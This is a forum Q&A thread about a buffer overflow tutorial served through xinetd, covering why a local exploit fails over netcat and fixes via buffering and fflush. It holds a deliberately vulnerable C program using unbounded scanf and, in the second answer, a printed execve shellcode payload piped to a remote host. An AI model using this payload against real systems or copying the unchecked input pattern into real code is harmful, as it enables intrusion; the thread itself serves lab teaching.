Simple buffer overflow via xinetd

Question

I'm trying to make a simple buffer overflow tutorial that runs the program below as a service on port 8000 via xinetd. Code was compiled using

gcc -o bof bof.c -fno-stack-protector 

ubuntu has stack protection turned off as well.

Exploiting locally i.e

python -c ---snippet--- | ./bof 

is successful and the hidden function was executed, displaying text file contents.

However, running it as a service and performing

python -c ---snippet--- | nc localhost 8000

returns nothing when exploiting. Am I missing something here?

#include <stdio.h>

void secret()
{
    int c;
    FILE *file;
    file = fopen("congratulations.txt", "r");
    if (file) {
    while ((c= getc(file)) !=EOF)
    putchar(c);
    fclose(file);


}

void textdisplay()
{
    char buffer[56];

    scanf("%s", buffer);
    printf("You entered: %s\n", buffer);
}

int main()
{
    textdisplay();

    return 0;
}

Answer 1

Output is buffered by default. To disable this you can do the following at the top of main:

setbuf(stdin, NULL);

This should fix your issue.

Answer 2

This is an issue that I am running into as well. Almost exactly the same.

However, here is one piece that I have found out that might be helpful to you. I believe the issue has something to do with xinetd not executing the binary as a terminal and having job control.

So what I did was to have xinetd do:

server = /usr/bin/python
server_args = /opt/shell.py

Then within the /opt/shell.py I had:

import pty
pty.spawn("/opt/oflow.elf")

/opt/oflow.elf being my overflowed binary

When I do this, I can actually send and receive data. Thats when I run the following command via netcat to try and overflow the service remotely:

**printf "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80AAAAAAAAAAAAAAAAAAAAAAAAABCDEFGHIJKLMNOPQ\x7c\xfc\xff\xbf" | nc 192.168.1.2 9000**

This does nothing. However, I test the local version and it works PERFECTLY. Works every time.

Not when its being wrapped in a python pty and xinetd.

When I run the xinetd pointing directly to /opt/oflow.elf, I get absolutely nothing back from netcat.

So that doesn't exactly answer your question but it should whittle it down for you.

UPDATED COMPLETE ANSWER:

I figured out why this wasnt working. No need to use python at all. After every printf statement you must also include:

fflush(stdout);

Otherwise, xinetd doesnt know to send the stdout.

You may also need to do this for stdin:

fflush(stdin);